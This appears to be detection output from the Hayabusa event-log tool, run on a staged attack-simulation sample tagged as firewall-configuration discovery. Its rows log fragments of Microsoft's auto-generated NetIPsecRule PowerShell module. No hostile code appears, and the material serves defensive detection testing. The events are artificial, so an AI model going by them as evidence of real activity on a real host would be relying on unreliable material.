$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShe,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if 